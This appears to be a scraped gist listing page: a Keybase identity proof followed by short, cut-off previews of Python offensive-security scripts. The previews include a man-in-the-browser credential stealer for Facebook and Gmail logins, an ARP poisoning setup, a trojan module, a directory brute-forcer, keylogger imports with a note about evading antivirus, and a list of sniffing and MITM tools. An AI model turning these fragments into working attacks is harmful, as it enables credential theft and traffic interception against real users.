I hereby claim:
- I am sh1nu11bi on github.
- I am sh1nu11bi (https://keybase.io/sh1nu11bi) on keybase.
- I have a public key whose fingerprint is 3BA5 FB9B C6C3 4812 15D8 04CB 0FBA 146F E8FD 3B2B
To claim this, I am signing this object:
| mitb.py will create a simple example example that will watch for a user browsing Facebook or GMail,de-auth them, and then | |
| modify the login form to send their username and password to an HTTP server that we control. | |
| Our HTTP server will then simply redirect them back to the real login page. | |
| import socket | |
| import os | |
| import struct | |
| import threading | |
| from netaddr import IPNetwork,IPAddress | |
| from ctypes import * | |
| # host to listen on | |
| host = "192.168.0.187" |
| from scapy.all import * | |
| import os | |
| import sys | |
| import threading | |
| interface = "en1" | |
| target_ip = "172.16.1.71" | |
| gateway_ip = "172.16.1.254" | |
| packet_count = 1000 | |
| poisoning = True |
| # dirlister.py | |
| __version__ = "0.1" | |
| import os | |
| def run(**args): | |
| print "[*] Dirlister module." | |
| files = os.listdir(".") | |
| return str(files) |
| import urllib2 | |
| import urllib | |
| import threading | |
| import Queue | |
| threads = 5 | |
| target_url = "http://testphp.vulnweb.com" | |
| wordlist_file = "/tmp/all.txt" # from SVNDigger | |
| resume = None | |
| user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" |
| from ctypes import * | |
| import pythoncom | |
| import pyHook | |
| import win32clipboard | |
| user32 = windll.user32 | |
| kernel32 = windll.kernel32 | |
| psapi = windll.psapi | |
| current_window = None |
| This process does not involve any API hooking, so we can fly under most anti-virus software's radar. | |
| localhost$ easy_install pywin32 wmi | |
| http://sourceforge.net/projects/pywin32 |
| 1.Download Version/acrh for sublime text2 | |
| http://www.sublimetext.com/2 | |
| Packages download | |
| I used to use Sublime Text 2 with |
| Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library | |
| pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap | |
| libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission | |
| dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols | |
| Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB | |
| pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection | |
| Dirtbags py-pcap: read pcap files without libpcap | |
| flowgrep: grep through packet payloads using regular expressions | |
| Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist | |
| Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly |
I hereby claim:
To claim this, I am signing this object: